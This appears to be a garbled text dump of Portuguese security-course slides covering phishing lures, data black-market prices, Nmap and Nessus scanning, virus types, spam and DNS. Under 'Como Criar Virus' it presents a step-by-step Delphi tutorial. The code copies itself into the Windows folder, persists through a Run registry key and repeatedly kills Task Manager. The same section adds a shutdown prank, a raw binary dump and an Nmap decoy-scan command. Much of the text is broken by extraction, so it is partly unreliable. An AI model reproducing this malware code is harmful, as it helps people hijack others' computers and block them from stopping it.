Amores On-line - carto virtual - Equipe Carteiro Romntico - Uma pessoa que lhe admira enviou um carto As fotos que eu tinha prometido. lbum pessoal de fotos AVG Antivrus - Detectamos que seu E.Mail est enviando mensagens contaminadas com o vrus w32. bugbear Aviso - voc est sendo trado - veja as fotos Aviso - voc est sendo trado - veja as imagens do motel Banco do Brasil informa - Sua chave e senha de acesso foram bloqueados Contrato Pendente - Clique para fazer atualizao Big Brother Brasil - ao vivo - quer ver tudo ao vivo e ainda concorrer a promoes exclusivas? Clique na fechadura Cmara dos Dirigentes Lojistas - SPC - Servio de Proteo ao Crdito Notificao - Pendncias Financeiras - Baixar o arquivo de relatrio de pendncias. carnaval 2005 - veja o que rolou nos bastidores do carnaval de So Paulo Carto Terra - eu te amo - webcard enviado atravs do site Cartes Terra Carto UOL - I love you - voc recebeu um carto musical - Para visualizar e ouvir escolha uma das imagens Cartes BOL - Voc recebeu um carto BOL Cartesnico.com - Seu amor criou um carto para voc Checkline - Consultas de crdito on-line - Consultas no Serasa/SPC Claro Idias - Grande chance de ganhar meio milho de reais em ouro e 18 carros Colaneri e Campos Ltda - Ao Gerente de Vendas - oramento de material e equipamentos em urgncia

Lista de Hackers fornecida:


j j j j j j j j j j j j j j j j j j j j

Correio Virtual - hi5 - Seu Amor te enviou este carto CPF cancelado ou pendente de regularizao - verifique; seu CPF est cancelado Declarao de Imposto de Renda de 2005/06 - Ministrio da Fazenda - CPF Cancelado ou Pendente de Regularizao Ebay - your account could be suspended - Billing Department Embratel - Comunicado de Cobrana - Aviso de Bloqueio Embratel - Notificao Confidencial - Fatura de servios prestados Clique para detalhamento da fatura Emotion Cards - UOL - Parabns voc recebeu um Presente Virtual Febraban - Guia de Segurana - Febrasoft Security Finasa - Nossa Caixa - Fraudes Bancrias - Febraban Fininvest - dbito em atraso - pendncias financeiras em seu CPF/CNPJ Ganhe uma viagem a Paris - Guia Paris Lumire Gmail - Gmail Amigo Oculto - Baixar Formulrio - E-mail de 1 Giga Humortadela - Piada animada sempre amigos Humortadela - voc 10 - acesse o link e sacaneie Humortadela - voc recebeu uma piada animada - Ver Piada Animada Ibest - acesso grtis e fcil - discador ibest - 0800 conexo sem pulso telefnico. Grtis - Download Larissa 22 aninhos - www. mclass. com. br - clique aqui e veja o vdeo Leiam esta informao IMPORTANTe Martins Com Ltda - Setor de Compras - Oramento Mercado Livre - Aviso - Saldo devedor em aberto na sua conta - e pagamento no for quitado acionaremos departamento jurdico

Lista de Hackers fornecida:


j j j j j j j j j j j j j j j j j

Ol, h quanto tempo! Eu me mudei para os Estados Unidos, e perdemos contato... Olha o que a Globo preparou para voc neste ano de 2005 - Big Brother Brasil 5 - Baixe o vdeo Overture - Promoo para novos assinantes - Tem cliente procurando, tem voc oferecendo, vamos juntar os dois. Seja encontrado por quem quer comprar Paparazzo - globo. com - se voc gostou de uma espiada no vdeo Parperfeito - Voc foi adicionado aos prediletos - Associado do Par Perfeito Passe Livre de 7 dias no Globo Media Center Promoo Fotolog.net e UBBI - sorteio de 10 Gold Cam por dia - Crie seu fotolog e concorra Radio Terra - dedique uma msica Receita Federal - CPF cancelado ou pendente de regularizao Saudades de voc - Sou algum que te conheceu h muito tempo, e tive que fazer uma viagem - Espero que goste das fotos SERASA - pendncias referentes a seu nome - Extrato de dbito SERASA - Regularize seu CPF ou CNPJ - clique para extrato de dbitos Sexy Clube - Thaty Rio - Direto do Big Brother - Veja as fotos em primeira mo Sou um amigo seu - voc est sendo trado - veja as fotos Symantec - Faa sua atualizao do Norton 2005 aqui - Gratuita - Licena para 1 ano grtis Terra Cartes - O meu melhor presente voc Tim ps pago - pendncias no SPC - Sistema de Proteo aoCrdito - Serial do Celular

Lista de Hackers fornecida:


j j j j j j j j j j j j j j j

Microsoft - Ferramenta de remoo de softwares Mal-Intencionados do Microsoft Windows - Windows XP fica a cara de quem recebe um carto Voxcards Microsoft Software - Este contedo foi testado e fornecido a voc pela Microsoft Corporation - Veja as novidades Music Cards - Confirmao Necktsun Comrcio Ltda - Palmas - Departamento de Vendas - Oramento Netcard Cartes Virtuais - Emoes de verdade Norton Antivrus - Alerta de Segurana - download do antdoto para o Ms. Bruner Notificao Confidencial - Pendncias Financeiras em seu CPF O carteiro - voc recebeu um carto de quem te admira O carteiro. com - tenho uma novidade para voc - veja o carto que preparei Voxcards - carto voxcards - para quem voc vai mandar um carto hoje? Voxcards - mensageiro - voc est recebendo um carto virtual voxcards Precisa instalar o plugin - clique para instalar Webcard Terra - Feliz Dia das Mes - Existe um presente especial esperando por voc no site de cartes do terra. Week - Complimentary Subscription Confirmation - Free - Please Apply online PC Week www. symantec. com - A soluo Antivrus mais confivel do mundo www.microsoft. com - Proteja seu computador com antivrus

Lista de Hackers fornecida:


j j j j j j j j j j j j j

UOL - Promoo Cultural - Cara cad meu carro UOL Cartes - Estou com saudades - clique para visualizar UOL Cartes - Seu amor lhe enviou um carto - clique para baixar UOL Cartes - Voc recebeu um lindo carto virtual Veja as fotos proibidas das musas do bbb5 Viagens contaminadas com o w32. bugbear Virtual Cards - Um grande abrao da equipe virtual cards - ler carto VIVO - Torpedos Web Gratuito - Torpedo Fcil Vivo Yahoo Cartes - Voc tudo para mim - clique na imagem Yahoo Cartes - Voc tudo para mim - enviado por quem te admira Outra dica importante: nunca abra E-Mails de remetentes desconhecidos! Sempre desconfie de E-Mails que solicitam 'clique aqui' ou ' acesse o link (tal)' ou ' veja minha foto' ou ' te encontrei , lembra-se de mim? ' ou ' ligue-me para sairmos' , etc... E, finalmente, para ter certeza que de um golpe que voc est sendo vtima, passe o mouse - sem clicar - pela palavra do direcionamento : voc vai ver, na barra inferior - esquerda da tela -, que se trata de um arquivo com a terminao 'exe' ou 'scr' ou outra. Arquivo este(s) que vai (vo) espionar seu computador, roubando seus dados, senhas, etc.

Symantec: relatrio mapeia mercado negro de dados


j

Um estudo conduzido pela Symantec mapeou o mercado negro de dados. O relatrio traz o preo das informaes negociadas por criminosos e mostra como as empresas podem ter prejuzos com a vulnerabilidade dos dados dos clientes.

Segundo Marcelo Silva, diretor de servios da companhia no Brasil, j existe um ecossistema criado em torno do roubo de dados. Quem rouba nem sempre vende os dados. A gente fala de crime organizado, mas o que existe um grande mercado, afirma o executivo. Veja tabela com o preo dos dados no mercado negro:
j

Produto Contas bancrias Cartes de crdito Identidades completas Contas do eBay Senhas de e-mail Proxies

Preo de 10 dlares a mil dlares de 0,40 dlar a 20 dlares de 1 dlar a 15 dlares de 1 dlar a 18 dlares de 4 dlares a 30 dlares de 1,5 dlar a 30 dlares

CW Connect - No grupo de discusso sobre Crimes Digitais do CW Connect, a primeira rede social para profissionais de tecnologia da informao e telecomunicaes do mercado, uma das participantes - a analista Fabiana inseriu uma pesquisa sobre as principais ameaas s informaes da empresa: 1 - Vrus 75% (Por falta de conhecimento os usurios baixam programas sem conhecimento, acessam sites suspeitos, etc) 2 - Divulgao de senhas 57% 3 - Hackers 44% 4 - Funcionrios insatisfeitos 42% 5 - Acessos indevidos 40% 6 - Vazamento de informaes 33%

152

Tcnicas para Alcanar os Objetivos da Segurana


j Deve-se perguntar: Proteger O QU? Proteger DE QUEM? Proteger A QUE CUSTOS? Proteger COM QUE RISCOS? j O axioma da segurana bastante

conhecido de todos, mas verdadeiro:


"Uma corrente no mais forte do que o seu elo mais fraco"
153

Custo de Segurana:

154

Custo Visiveis x Invisiveis:

155

At alizao do ambiente
Q ando as ameaas ocorrem?

A maioria dos ataques acontece aqui

Produto Lanado

Vulnerabilidade Fix descoberta disponve l

Fix instalado pelo cliente

At alizao do ambiente
Tempo para a invaso dimin indo
Invaso

331 O tempo (em dias) entre a 18 disponibilizao da Produto 0 151 Vulnerabilidade Fix Fix instalado Lanado descoberta disponvel e a invaso pelo cliente correo 25 tem diminudo, 14 portanto a aplicao Nimd SQL Welchia Blaste Sasser de patches no pode a Slamm / Nachi r er ser a nica defesa em grandes empresas

Atualizao do ambiente
Worm Zotob
j 09/08 - A Microsoft

publica a correo

j 11/08 - A Microsoft

informa que um ataque est na eminencia de acontecer sobre essa vulnerabilidade

j 17/08 - CNN e ABC

so atacadas

Principais Ameaas

9 edio da Pesquisa Nacional de Segurana da Informao da Mdulo Security

Principais Obstculos

9 edio da Pesquisa Nacional de Segurana da Informao da Mdulo Security

Anlise de Segurana
So falhas em servios, aplicativos e sistemas operacionais que pode acarretar acesso ao sistemas parcial ou total em nvel de administrao. j Hoje temos ferramentas de escaneamento de vulnerabilidades que detecta falhas de sistemas, mais tambm so utilizadas para invaso. j Segundo o site sectools.org temos as 10 principais ferramentas de escaneamento de vulnerabilidades de sistemas. Nessus, GFI LANguard, Retina, Core Impact, ISS Internet Scanner, X-scan, Sara, QualysGuard, SAINT, MBSA
j

161

Solues para a Insegurana Informtica


j NMAP

- uma ferramenta para explorao de rede criada


pelo Fyodor. uma das ferramentas mais importantes para engenharia de segurana ou pentester. Com ele voc poder entrar em uma rede e buscar servios que esto escutando em cada porta especifica. Voc pode fazer um varredura de tcp()connect que far uma conexo completa com o host ou uma syn scan que far uma simples conexo que servir para testar regras de firewall por exemplo.
162

Solues para a Insegurana Informtica


j NMAP (I)

Alvo: MS-Windows 95 modificado


163

Solues para a Insegurana Informtica


j NMAP (II)

Alvo: Linux Mandrake modificado

164

j NMAP (comandos)

Solues para a Insegurana Informtica


Um rastreio(scan) tpico do Nmap mostrado em Example 1, Uma amostra de rastreio(scan) do Nmap. Os nicos argumentos que o Nmap utiliza nesse exemplo so -A para permitir a deteco de SO e a verso -T4 para execuo mais rpida e os nomes de anfitrio(hostnames) de dois alvos.
165

j NMAP (comandos - Ubuntu)

Solues para a Insegurana Informtica


Version detection: Aps as portas TCP e/ou UDP serem descobertas por algum dos mtodos, o nmap ir determinar qual o servio est rodando atualmente. O arquivo nmapservice-probes utilizado para determinar tipos de protocolos, nome da aplicao, nmero da verso e outros detalhes
166

Solues para a Insegurana Informtica


j NMAP (comandos - Ubuntu)
D <decoy1,[decoy2],[SEU_IP]...> Durante uma varredura, utiliza uma srie de endereos falsificados, simulando que o scanning tenha originado desses vrios hosts, sendo praticamente impossvel identificar a verdadeira origem da varredura. sudo nmap -D IP1,IP2,IP3,IP4,IP6,SEU_IP 192.168.0.1
167

Solues para a Insegurana Informtica


j Anlise de Segurana

Mtodo de deteco remota de vulnerabilidades Aplicaes como o NMAP no tiram concluses Existe outro tipo de aplicao que efectua o levantamento remoto de recursos, detecta vulnerabilidades, alerta o utilizador ou lana ataques NESSUS (Nessus Security Scanner) uma ferramenta sofisticada que funciona de forma semiautomtica Pode ser usada para obter relatrios de segurana informtica Tambm pode ser utilizada para atacar uma plataforma Incorpora ataques de negao de servio, teste de exploits, etc Facilita muito a actividade dos crackers

168

Solues para a Insegurana Informtica


j NESSUS
- At h pouco tempo o Nessus s funcionava no Linux, mas recentemente foi lanado o Nessus para Windows. uma excelente ferramenta designada para testar e descobrir falhas de segurana (portas, vulnerabilidades, exploits) de uma ou mais mquinas. - Estas falhas ou problemas podem ser descobertos por um grupo hacker, um nico hacker, uma empresa de segurana ou pelo prprio fabricante, podendo ser de maneira acidental ou proposital, O Nessus ajuda a identificar e resolver estes problemas antes que algum tire vantagem destes com propsitos maliciosos.

169

Solues para a Insegurana Informtica


j NESSUS
Alvo: Linux SuSE Detectando Nmap

170

Solues para a Insegurana Informtica


j NESSUS
Alvo: MSWindows 95 Detectando Nmpa

171

j NESSUS

Solues para a Insegurana Informtica Linux RedHat aps instalao Alvo:

172

Solues para a Insegurana Informtica


j NESSUS
Verificao da ppria mquina

173

Solues para a Insegurana Informtica


j NESSUS - Report

Solues para a Insegurana Informtica


j NESSUS Report com formato HTML

VRUS

Tipos de Virus
Um dos primeiros tipos de vrus conhecido, o vrus de boot infecta a partio de inicializao do sistema operacional. Assim, ele ativado quando o computador ligado e o sistema operacional carregado. j Time Bomb Os vrus do tipo "bomba de tempo" so programados para se ativarem em determinados momentos, definidos pelo seu criador. Uma vez infectado um determinado sistema, o vrus somente se tornar ativo e causar algum tipo de dano no dia ou momento previamente definido. Alguns vrus se tornaram famosos, como o "Sexta-Feira 13" e o "Michelangelo". Minhocas, worm ou vermes Com o interesse de fazer um vrus se espalhar da forma mais abrangente possvel, seus criadores por vezes, deixaram de lado o desejo de danificar o sistema dos usurios infectados e passaram a programar seus vrus de forma que apenas se repliquem, sem o objetivo de causar graves danos ao sistema. Desta forma, seus autores visam tornar suas criaes mais conhecidas na Internet. Este tipo de vrus passou a ser chamada de verme ou worm. Eles esto mais aperfeioados, j h uma verso que ao atacar a mquina hospedeira, no s se replica, mas tambm se propaga pela internet pelos e-mail que esto registrados no cliente de e-mail, infectando as mquinas que abrirem aquele e-mail, reiniciando o ciclo
j Vrus de Boot

Tipos de Virus (cont)


j

Trojans ou cavalos de Tria Certos vrus trazem em seu bojo um cdigo a parte, que permite a um estranho acessar o micro infectado ou coletar dados e envi-los pela Internet para um desconhecido, sem notificar o usurio. Estes cdigos so denominados de Trojans ou cavalos de Tria. Inicialmente, os cavalos de Tria permitiam que o micro infectado pudesse receber comandos externos, sem o conhecimento do usurio. Desta forma o invasor poderia ler, copiar, apagar e alterar dados do sistema. Atualmente os cavalos de Tria agora procuram roubar dados confidenciais do usurio, como senhas bancrias. Os vrus eram no passado, os maiores responsveis pela instalao dos cavalos de Tria, como parte de sua ao, pois eles no tm a capacidade de se replicar. Atualmente, os cavalos de Tria no mais chegam exclusivamente transportados por vrus, agora so instalados quando o usurio baixa um arquivo da Internet e o executa. Prtica eficaz devido a enorme quantidade de e-mails fraudulentos que chegam nas caixas postais dos usurios. Tais e-mails contm um endereo na Web para a vtima baixar o cavalo de Tria, ao invs do arquivo que a mensagem diz ser. Esta prtica se denomina phishing,expresso derivada do verbo to fish, "pescar" em ingls. Atualmente, a maioria dos cavalos de Tria visam sites bancrios, "pescando" a senha digitada pelos usurios dos micros infectados. H tambm cavalos de Tria que ao serem baixados da internet "guardados" em falsos programas ou em anexos de email, encriptografam os dados e os comprimem no formato ZIP. Um arquivo .txt d as "regras do jogo": os dados foram "seqestrados" e s sero "libertados" mediante pagamento em dinheiro para uma determinada conta bancria, quando ser fornecido o cdigo restaurador. Tambm os cavalos de tria podem ser usados para levar o usurio para sites falsos, onde sem seu conhecimento, sero baixados trojans para fins criminosos, como aconteceu com os links do google, pois uma falha de segurana poderia levar um usurio para uma pgina falsa. Por este motivo o servio esteve fora do ar por algumas horas para corrigir esse bug, pois caso contrrio as pessoas que no distinguissem o site original do falsificado seriam afetadas. Hijackers Hijackers so programas ou scripts que "sequestram" navegadores de Internet, principalmente o Internet Explorer. Quando isso ocorre, o hijacker altera a pgina inicial do browser e impede o usurio de mud-la, exibe propagandas em pop-ups ou janelas novas, instala barras de ferramentas no navegador e podem impedir acesso a determinados sites (como sites de software antivrus, por exemplo).

Tipos de Virus (cont)


j

Vrus no Orkut Em torno de 2006 e 2007 houve muitas ocorrncias de vrus no Orkut que capaz de enviar scraps (recados) automaticamente para todos os contatos da vtima na rede social, alm de roubar senhas e contas bancrias de um micro infectado atravs da captura de teclas e cliques. Apesar de que aqueles que receberem o recado precisam clicar em um link para se infectar, a relao de confiana existente entre os amigos aumenta muito a possibilidade de o usurio clicar sem desconfiar de que o link leva para um worm. Ao clicar no link, um arquivo bem pequeno baixado para o computador do usurio. Ele se encarrega de baixar e instalar o restante das partes da praga, que enviar a mensagem para todos os contatos do Orkut. Alm de simplesmente se espalhar usando a rede do Orkut, o vrus tambm rouba senhas de banco, em outras palavras, um clssico Banker. Keylogger O KeyLogger uma das espcies de vrus existentes, o significado dos termos em ingls que mais se encaixa no contexto seria: Capturador de teclas. Ao serem executados, normalmente os keyloggers ficam escondidos no sistema operacional, sendo assim a vtima no tem como saber que est sendo monitorada. Atualmente os keyloggers so desenvolvidos para meios ilcitos, como por exemplo roubo de senhas bancrias. So utilizados tambm por usurios com um pouco mais de conhecimento para poder obter senhas pessoais, como email, orkut, MSN, entre outros. Existem tipos de keyloggers que capturam a tela da vtima, sendo assim, quem implantou o keylogger tem controle sobre o que a pessoa est fazendo no computador. Estado Zumbi O estado zumbi em um computador ocorre quando infectado e est sendo controlado por terceiros. Podem us-lo para disseminar, vrus , keyloggers, e procededimentos invasivos em geral. Usualmente esta situao ocorre pelo fato da mquina estar com seu Firewall e ou Sistema Operacional desatualizados. Segundo estudos na rea, um computador que est na internet nessas condies tem quase 50% de chance de se tornar uma mquina zumbi, que dependendo de quem est controlando, quase sempre com fins criminosos, como acontece vez ou outra, quando crackers so presos por formar exrcitos zumbis para roubar dinheiro das contas correntes e extorquir.

Tipos de Virus (cont)


j

Vrus de E-mail At pouco tempo atrs no existiam vrus de E-mail e todos os textos que circulavam sobre isso eram Hoax (trotes). Recentemente surgiram novos tipos de worm, que se propagam por mails e no necessitam que se execute qualquer programa anexado ou no a mensagens como por exemplo: KakWorm, Romeu e Julieta e Davinia. KakWorm : S ataca as verses inglesa e francesa do Outlook. Para que a contaminao acontea basta que uma mensagem contaminada seja exibida no painel de visualizao, sem necessidade de abrir o mail. Alm de sua autopropagao, o principal efeito consiste no desligamento do computador. Ele se aloja no final de cada mensagem enviada como se fosse uma assinatura e todas as mensagens levaro consigo o KakWorm. Todo primeiro dia do ms, s17hs, apresentada a mensagem: Kagou-Anti-Kro$oft says not today!. Em seguida, o computador desligado. Romeu e Julieta : Ataca os computadores que usam as verses 4.0, 4.01, 5.0, e 5.01 do navegador Internet Explorer em computadores que usam o Windows 95, 98, Me ou 2000. Ele se autopropaga por meio do envio de mensagens e causa instabilidades no computador contaminado. Uma caracterstica desse worm que o assunto (subject) da mensagem que contm o vrus varia e selecionado aleatoriamente entre os seguintes: Romeo&Juliet - where is my juliet - where is my romeo ? - hi - last wish ??? - lol :) - ,,, - !!! - newborn - merry christmas! - surprise ! - Caution: NEW VIRUS ! - scandal ! - ^_^ - Re: - Romeo&Juliet - <> :)))))) - hello world !!??!?!? - subject - ble bla, bee - I Love You ;) - sorry - Hey you ! Matrix has you - my picture from shake-beer Davinia: capaz de contaminar e de autopropagar-se sem a existncia de um arquivo anexado mensagem, danifica todos os arquivos .html e os deixa irrecuperveis.

Tipos de Virus (cont)


j

Vrus de macro Quando se usa alguns programas, por exemplo um editor de texto, e necessita-se executar uma tarefa repetidas vezes em seqncia (por exemplo substituir todos os eh por ) pode-se editar um comando nico para efetu-las. Esse comando chamado de macro, que pode ser salvo em um modelo para ser aplicado em outros arquivos. Alm dessa opo da prpria pessoa fazer um modelo os comandos bsicos dos editores de texto tambm funcionam com modelos. Os vrus de macro atacam justamente esses arquivos comprometendo o funcionamento do programa. Os alvos principais so os prprios editores de texto (Word) e as planilhas de clculo (Excel). A disseminao desse tipo de vrus muito mais acentuada pois documentos so muito mveis e passam de mquina em mquina . Ao escrever, editar ou, simplesmente, ler arquivos vindos de computadores infectados a contaminao ocorre. Assim, verdadeiras epidemias podem acontecer em pouco tempo. Alm disso, os macrovrus constituem a primeira categoria de vrus multiplataforma, ou seja, no se limitam aos computadores pessoais, podendo infectar tambm outras plataformas que usem o mesmo programa, como o Macintosh, por exemplo.

Phishing scam
j Bastante comum, esse tipo de golpe virtual

baseado no envio de e-mails sugerindo que os internautas baixem arquivos ou visitem sites maliciosos. Outra possibilidade para enganar os usurios da web a oferta de links, tambm para pginas fraudulentas, em variados sites, blogs e redes sociais. Quando aceitam a sugesto dos piratas, abrindo os arquivos ou visitando esses endereos, as vtimas em potencial podem infectar seus computadores involuntariamente com programas maliciosos. Geralmente, essas pragas instaladas na mquina tm como objetivo roubar informaes pessoais dos usurios de internet.
182

Phishing scam

183

184

O que significa SPAM

j O termo SPAM origina-se de um programa

de srie inglesa de comdia onde os clientes pediam repetidamente SPAM, marca de um presunto enlatado americano.

j Na informtica significa enviar mensagens

para qualquer quantidade de usurios, sem obter prvia autorizao.

Como Evitar SPAM


j Existem diversas formas de bloqueio de mensagens

no solicitadas. Vrios programas fazem esse servio, como por exemplo, o SPAM Assassin. So configurados para bloquear as mensagens vindas de endereos conhecidos que disseminam essas mensagens. Bloqueia-se tambm as mensagens contendo alguma palavra ou expresso especfica, por exemplo:

j Compre um notebook j Troque seus cartuchos de impressoras j Free teen images

ataque-servidor 6% ataque-usuario 4% spam 24%

axfr 32%

scan 30% invasao 3%

dos 1% fraude 0%

Posso enviar um vrus por brincadeira?


No! Mesmo por brincadeira, enviar um vrus de computador pode configurar crime de dano. Certifique-se que os anexos transmitidos so arquivos benignos e teis ao destinatrio. Cdigo Penal
Dano Art. 163 - Destruir, inutilizar ou deteriorar coisa alheia: Pena -Um vrus de um a seis meses, ou multa. deteno, pode se propagar de diversas formas.

 anexo

 download  engenharia social


188

Possveis danos
j j j j

Perda de desempenho do micro; Excluso de arquivos; Alterao de dados; Acesso a informaes confidenciais por pessoas no autorizadas; j Perda de desempenho da rede (local e Internet); j Monitoramento de utilizao (espies); j Desconfigurao do Sistema Operacional. j Inutilizaro de determinadas peas.

Detectando, prevenindo e combatendo os vrus

190

E os anti-vrus so

191

Anti virus em ao

Anti Spywere em ao

Como Criar Virus

194

Cdigo de Vrus
j Teste

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICARSTANDARD-ANTIVIRUS-TEST-FILE!$H+H*
j Malicioso (Salvar no Bloco de Nota

Vassoura.exe) AZP/LX2K*.*BAT.COM/ELIMINAR*HD*/DETE... AIL.COM/AMDWIN@*.*

195

Cdigo de Vrus (cont)


MZ

j Ctfmon32.dll Virus Perigoso No sai do computador:


@ @ !L!This program cannot be run in DOS mode. $ PE L wE ! A @ P @ N 0 \ @@ .data l @ .text m .idata \ 0 @ .edata N @ @ @ 0/ < ! 0/ ! 0;9# NTDLL.DLL UE u(E @ # @ t 5 @ u 1 U V uVjh @ 5 @ jz0@ h @ 0@ h @ P0@ @ uuuuu u @ EVjh @ 5 @ jz0@ ^E U V uVjh2 @ 5. @ jz0@ h @ 0@ hD @ P0@ @ @ uuuuu u@ @ EVjh: @ 5. @ jz0@ ^E U VWuuuuu ulE 0 }E u GEw E E GEwE E h@ 0@ 9u: Pu u&E @ @uuuuPuE uuuu5 @ uE uaE EE4h@ 0@ 9u< PuO u( @ ;E sE @uuuuPuPEuuuuu u4E_^E U VWEM }@ f uE _^E U V uVjhW @ 5S @ jz0@ h @ 0@ hi @ P0@ e @ uuu ue @ EVjh_ @ 5S @ jz0@ ^E U VWuuuuu uE 0 }E u G EwE E GEwE E h@ 0@ 9u: Pu u&E @ @uuuuPu\E uuuu5 @ u:E uaE EE4h@ 0@ 9u< PuK u( @ ;E sE @uuuuPuEuuuuu uE_^E U VWuuu uE |v }upE } WD; @ u @ 77 X7V E9uE tGD; @ u u }}GD; @ uu _^E U VWh @ 0@ EhD @ 0@ D @ 4jhi @ 0@ i @ 4jh @ 0@ @ 4jhi @ u0@ S @ EPjhW @ 5S @ j~0@ _ @ h` @ /%@ d @ EPjh_ @ 5S @ jz0@ h @ u0@ @ EPjh @ 5 @ j~0@ @ h @ #@ @ EPjh @ 5 @ jz0@ hD @ u0@ . @ EPjh2 @ 5. @ j~0@ : @ h; @ !@ ? @ EPjh: @ 5. @ jz0@ _^Uuu uj .1@ 1 U EPjhW @ 5S @ jz0@ EPjh @ 5 @ jz0@ EPjh2 @ 5. @ jz0@ Uj 5 @ hN'@ j*1@ j 0@ UVS ud0 @ ;pu 0 X3 s @ X3 s[^ U VW @ f*f tf f @ @ EPj j h'@ j j 0@ _^ V0 <0 z0 1 J0 *1 p 0 p u E KERNEL32.DLL USER32.DLL 0 0 0 0 0 0 1 1 0 0 0 0 0 0 1 1 WriteProcessMemory ReadProcessMemory GetModuleHandleA GetProcAddress CreateThread Sleep lstrlenW lstrlenA 61 J1 61 J1 SetWindowsHookExA CallNextHookEx 2@ (@ ,@ 0@ !( >@ SYSHOST.DLL A 0*0000001 111.191?1G1a1g1o1t1z1 11 1111172=2d2222 2A3k3q3y3~333 333333;4A4h4 4444e5l5 55 55555 66 66 6'646=6B6M6S6[6a6h6l6r6~66 66 6 6666 66666666667 777"7&7,787>7F7^7u7{7 7 77 77*7 7777 7-8@8L8Y8c8

196

Cdigo de Vrus (cont)


j virus.bat

Criem um atalho e na localizao escrevam " shutdown -s -t 60 -c " qualquer coisa que queiram dizer, mas tem de ser entre aspas" T (TEMPO EM SEGUNDOS) Podem mudar C (Comentrio)

197

Virus em Delphi
j Existe muitas maneiras de criar um virus em

delphi, a maioria dos trojans famosos que circulo n internet foram feitos em delphi. Eu vou mostrar como fazer um virus reninciar junto com o windows e travar o Ctrl + Alt + Del. j Vamos la, Primeiro abra um projeto e coloque na uses "Registry," j Agora em baixo de "{$R *.dfm}" coloque isso:

198

procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce: boolean ); var sKey : string; reg : TRegIniFile; begin if( bRunOnce )then begin sKey := 'Once' end else begin sKey := ''; end; reg := TRegIniFile.Create( '' ); reg.RootKey := HKEY_LOCAL_MACHINE; reg.WriteString('Software\Microsoft' + '\Windows\CurrentVersion\Run'+ sKey + #0, sProgTitle, sCmdLine ); reg.Free; end; Agora no FormCreate coloque isso: procedure TForm1.FormCreate(Sender: TObject); begin Application.ShowMainForm := False; CopyFile(PChar(Application.ExeName),'C:\WINDOWS\virus.exe',True); RunOnStartup('virus','C:\WINDOWS\virus.exe',true); end;

199

Agora vamos fazer a parte de travar a listagem de processos, vou dar o coder todo basta voce fazer sua arte: unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, TLHelp32, PsAPI, ExtCtrls; type TForm1 = class(TForm) Timer1: TTimer; procedure Timer1Timer(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} function TerminarProcesso(sFile: String): Boolean; var verSystem: TOSVersionInfo; hdlSnap,hdlProcess: THandle; bPath,bLoop: Bool; peEntry: TProcessEntry32; arrPid: Array [0..1023] of DWORD; iC: DWord; k,iCount: Integer; arrModul: Array [0..299] of Char; hdlModul: HMODULE; begin Result := False; if ExtractFileName(sFile)=sFile then bPath:=false else bPath:=true; verSystem.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo); GetVersionEx(verSystem); if verSystem.dwPlatformId=VER_PLATFORM_WIN32_WINDOWS then begin hdlSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); peEntry.dwSize:=Sizeof(peEntry); bLoop:=Process32First(hdlSnap,peEntry); while integer(bLoop)<>0 do begin if bPath then begin if CompareText(peEntry.szExeFile,sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry .th32ProcessID), 0); Result := True; end; end else begin if CompareText(ExtractFileName(peEntry.szExeFile),sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry .th32ProcessID), 0); Result := True; end; end;

bLoop := Process32Next(hdlSnap,peEntry); end; CloseHandle(hdlSnap); end else if verSystem.dwPlatformId=VER_PLATFORM_WIN32_NT then begin EnumProcesses(@arrPid,SizeOf(arrPid),iC); iCount := iC div SizeOf(DWORD); for k := 0 to Pred(iCount) do begin hdlProcess:=OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,false,arrPid [k]); if (hdlProcess<>0) then begin EnumProcessModules(hdlProcess,@hdlModul,SizeOf(hdlModul),iC); GetModuleFilenameEx(hdlProcess,hdlModul,arrModul,SizeOf(arrModul) ); if bPath then begin if CompareText(arrModul,sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0); Result := True; end; end else begin if CompareText(ExtractFileName(arrModul),sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0); Result := True; end; end; CloseHandle(hdlProcess); end; end; end; end; procedure TForm1.Timer1Timer(Sender: TObject); begin TerminarProcesso('taskmgr.exe'); end; procedure TForm1.FormCreate(Sender: TObject); begin application.ShowMainForm := false; end; end.

200

A Dor do Blaster
j Duas linhas de cdigo C no RPCSS:
while (*pwszTemp != L'\\') *pwszServerName++ = *pwszTemp++;

j Levaram a
>15 milhes de computadores infectados 3.3M de chamados de suporte em Set. 2003 (volume normal relacionado a vrus de 350,000) Muita repercusso negativa
Isto aumentar o nvel de frustrao ao ponto que vrias organizaes iro contemplar seriamente alternativas Microsoft Gartner Group realmente recomendado ter cautela aqui. Os esforos [de segurana da Microsoft] foram sinceros, mas no estou certo se foram sinceros o suficiente. Forrester Research

Em que abordagem voc confia ?

Segurana como uma opo Segurana como um aditivo Integrao extremamente complicada No economicamente vivel No pode focar na principal prioridade

Segurana como parte do sistema Segurana Embutida na Rede Colaborao inteligente entre os elementos Viso de sistemas Foco direto na principal prioridade

JOGO DOS ERROS

EDUCAO DO USURIO ESSENCIAL

Prtica de Segurana x

204

Windows 2003 Server

205

Instalao

206

Instalao

207

Instalao

208

Instalao

209

Instalao 2003

210

Introduo a Servios

211

DNS

212

DNS - Domain Name Service


j Padro Aberto para Resoluo de

Nomes Hierrquicos

Agrupa nomes em domnios. A rvore de nomes armazenada num banco de dados distribudo distribudo.

j Especificaes do DNS RFCs 1033, 1034, 1034, 1101, 1123, 1183 e 1536.
Expecificaes da Internet Task Force

Berkeley Internet Name Domain (BIND)


Implementao desenvolvida na Berkley University para a verso 4.3 SD Unix

Servio DNS
Servio DNS Servidor DNS
Nome? IP

Nome?

IPB

m o mais servidores armazenam m banco de dados distrib dos

Nome de Domnio
j Os nomes Hierrquicos utilizados pelo DNS

so chamados FQDN: Fully Qualified Domain Name j Exemplo: www.pucpr.br www: nome do host pucpr: nome de domnio br: nome de domnio j Nome de domnio: Coleo de HOSTS ou de outros domnios.

